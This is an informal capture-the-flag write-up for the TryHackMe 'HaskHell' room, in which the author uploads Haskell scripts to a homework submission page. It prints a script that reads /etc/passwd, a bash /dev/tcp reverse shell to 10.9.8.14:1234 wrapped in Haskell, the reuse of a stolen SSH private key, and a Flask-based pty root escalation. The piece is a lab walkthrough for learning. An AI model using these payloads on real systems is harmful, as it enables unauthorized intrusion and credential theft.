sup! guys hoping you are fine. Today iam going to solve HaskHell room by tryhackme it is a free room so any one can solve it with out subscription.
now the story begins! Cution:- make sure you give a complte try before opening the writeup.
first as every time lets perform a basic nmap scan and find out the available ports.
from this we can find out there is no web server on the port-80 but its on 5001 so connect to it and find out what is on the webserver.
This is something about homework stuff about functional programing. functional programing is fun but doing it as a home work aha!..you know what Imean.ok lets come back to the main aim from the web server nothing much I coud find out so with out any wait I used gobuster to find out any extensions available.
so luckyly I found that something called submit exist. this would be guess if i was smart enough but not now haha so I went and opened it. and got struck.
just a uploder just??? not so when ever i see this type of upload option the first thing I do is to upload a reverse shell but in this case i didnt work and I had no idea what to do at next so again I opened the challenge discription and searched for haskhell but after some serach i found it was a language as haskell (https://www.haskell.org) from this i got an idea of writing the hs script and uploading it as home work luckyly this worked this time.
so,then I wrote an script to open “/etc/passwd”
“
#!/usr/bin/env runhaskell
import System.IO
main = do
handle <- openFile “/etc/passwd” ReadMode
contents <- hGetContents handle
putStr contents
hClose handle
“
so uploded this script and got the user.
so ther is a user named prof. now what ?? time to think……
after this i tried the same script with different file I went with the user text by assuming it as a normal linux system “/home/prof/user.txt” . set this path and upload the file you would get the user flag.
now time to get the shell.
as i told you at first upload a reverse shell i did the same thing again.But this time i wrote a script in hs.
####
import System.Process
main = do
callCommand “bash -c ‘bash -i >& /dev/tcp/10.9.8.14/1234 0>&1’”
####
The above one is the script which i had used to get the shell.
now the next step is root. After roming around the directories i got something from the prof directory that is “.ssh” so i opened it.
and found this after that i had copied the rsa text into a file and changed the permission “chmod 600 id_rsa” and connected it with the help of ssh
got the prof shell now time to get the root.
so by running simple python script “echo ‘import pty; pty.spawn(“/bin/bash”)”as FLASK_APP and run it.
tada! you got it for the flag cat /root/root.txt
That was a good move I got struck at some points but google helped me a lot time. thankyou for reading the post.hope you like it if yes do clap for the post.